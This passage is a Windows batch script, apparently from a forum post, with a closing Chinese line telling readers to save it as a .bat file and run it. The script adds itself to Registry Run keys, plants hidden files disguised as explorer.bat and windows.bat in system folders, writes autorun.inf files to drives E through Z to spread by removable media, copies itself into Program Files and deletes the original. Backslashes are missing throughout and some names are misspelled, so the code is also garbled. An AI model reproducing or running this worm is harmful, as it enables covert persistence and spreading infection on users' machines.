windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v
AUTOEXEC.BAT /t REG_SZ /d
C:AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v
AUTOEXEC.BAT /t REG_SZ /d
C:AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v
setup.bat /t REG_SZ /d d:setup.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v
setup.bat /t REG_SZ /d d:setup.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun /v
explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v
explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h%
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo
@echo off >>%%c:system.bat
for %%c in (%alldrive%) do echo start %windir%system32cmd.bat /min
>>%%c:system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:system.bat
set drive=e f g h i j k l m n o p q r s t u v w x y z
for %%c in (%drive%) do echo [AuroRun] >%%c:autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:autorun.inf
copy %0 d:Program" "Filesrun.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start
d:Program" "Filesrun.bat /min
>>%%c:system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:system.bat
for %%c in (%alldrive%) do attrib %%c:autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:Program" "Filesrun.bat
/min >>d:setup.bat
attrib d:Program" "Filesrun.bat +r +s +h >nul
del %0
exit
[/code]
把上面的代码存为.bat
打开文件即可